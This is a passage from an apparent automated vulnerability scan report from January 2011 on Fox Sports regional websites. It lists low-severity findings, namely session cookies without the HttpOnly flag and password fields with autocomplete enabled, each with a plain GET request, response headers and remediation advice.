<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...

3.16. http://www.foxsportstennessee.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foxsportstennessee.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.foxsportstennessee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:11 GMT
Server: Apache
Set-Cookie: PHPSESSID=452c8dd2904462f9015b783662923a87; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 68716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...

3.17. http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foxsportswest.com
Path:   /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html HTTP/1.1
Host: www.foxsportswest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:11 GMT
Server: Apache
Set-Cookie: PHPSESSID=52ba63048e530107d21cb80ac654b510; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 58751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...

3.18. http://www.foxsportswisconsin.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.foxsportswisconsin.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.foxsportswisconsin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:16 GMT
Server: Apache
Set-Cookie: PHPSESSID=b346a6944b6aa67934f8452ef87105ed; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...

4. Password field with autocomplete enabled  previous  next
There are 19 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


4.1. http://www.foxsportsarizona.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:38 GMT
Server: Apache
Set-Cookie: PHPSESSID=af9575f12421c13e00e39bf3dd199ca5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 84050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4.2. http://www.foxsportsarizona.com/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:38 GMT
Server: Apache
Set-Cookie: PHPSESSID=dce594637b946858ac8562e11cd29bfc; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4.3. http://www.foxsportscarolinas.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportscarolinas.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.foxsportscarolinas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 12 Jan 2011 16:30:48 GMT
Date: Wed, 12 Jan 2011 16:30:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=3271d39cc8617c11fa58992b3826f5a0; path=/
Content-Length: 67154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4.4. http://www.foxsportsdetroit.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:23:03 GMT
Server: Apache
Set-Cookie: PHPSESSID=f98e5e7a4e031dcbf5dbf7acff41bb35; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4.5. http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/Hoke-who/landing.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /01/11/11/Hoke-who/landing.html HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:26:41 GMT
Server: Apache
Set-Cookie: PHPSESSID=05e45841134be0f8e849c03d0475b24f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/01/11/11/Hoke-who/landing.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4.6. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:47 GMT
Server: Apache
Set-Cookie: PHPSESSID=f7fa2ad3beef39ba25d4799d4abff0a5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/01/11/11/Hoke-who/landing.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4.7. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html?blockID=389326&feedID=3701 HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:48 GMT
Server: Apache
Set-Cookie: PHPSESSID=539c0237c90a637a856e33299aeaf9bb; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/01/11/11/Open-Mike-Brady-Bunch-Michigan-hopes-so/landing.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4.8. http://www.foxsportsflorida.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:50 GMT
Server: Apache
Set-Cookie: PHPSESSID=aac2f23f8215a809567600eb37ffca51; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 76322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4.9. http://www.foxsportsflorida.com/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:50 GMT
Server: Apache
Set-Cookie: PHPSESSID=552dd2fb6e357039c005c0bb8665d203; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 47665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4.10. http://www.foxsportshouston.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportshouston.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.foxsportshouston.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=d3f0a37aad79eca82e7871d6bfdcad10; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 69986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4.11. http://www.foxsportskansascity.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportskansascity.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.foxsportskansascity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=9d01435dbe7e17e2b982f0304dd0dd69; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 67136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4.12. http://www.foxsportsmidwest.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportsmidwest.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.foxsportsmidwest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=be186108f22ff29fc5206079350ee590; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 76839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4.13. http://www.foxsportsohio.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportsohio.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.foxsportsohio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:02 GMT
Server: Apache
Set-Cookie: PHPSESSID=090a220f00fee006a09844523813c3f9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 78763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4.14. http://www.foxsportssouth.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportssouth.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.foxsportssouth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:08 GMT
Server: Apache
Set-Cookie: PHPSESSID=8fc384966e11984cdc4ff0ba62e6bda3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 87289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html xmlns="http
...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4.15. http://www.foxsportssouth.com/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportssouth.com
Path:   /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html?blockID=389214&feedID=4354 HTTP/1.1
Host: www.foxsportssouth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:23:29 GMT
Server: Apache
Set-Cookie: PHPSESSID=f9238600833496253f5dffcf1949b4ff; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 83915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html xmlns="http
...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/01/11/11/Size-matters-in-the-SEC/landing_bcstitle.html" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4.16. http://www.foxsportssouthwest.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportssouthwest.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.foxsportssouthwest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:09 GMT
Server: Apache
Set-Cookie: PHPSESSID=7d9d4d196f8c57526962134428908ef5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4.17. http://www.foxsportstennessee.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportstennessee.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.foxsportstennessee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:11 GMT
Server: Apache
Set-Cookie: PHPSESSID=452c8dd2904462f9015b783662923a87; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 68716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<table width='100%' cellpadding=0 cellspacing=0 border=0 bgcolor=''>
<form enctype="multipart/form-data" action="/" Name= "" ID = "" method="post">
<tr>
...[SNIP]...
<td>pass:<input type=password name='login_password' class='loginblock'></td>
...[SNIP]...

4.18. http://www.foxsportswest.com/01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.foxsportswest.com
Path:   /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /01/12/11/Cavs-roster-full-of-no-names-with-no-gam/landing_witz.html HTTP/1.1
Host: www.foxsportswest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:11 GMT
Server: Apache
Set-Cookie: PHPSESSID=52ba63048e530107d21cb80ac654b510; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 58751

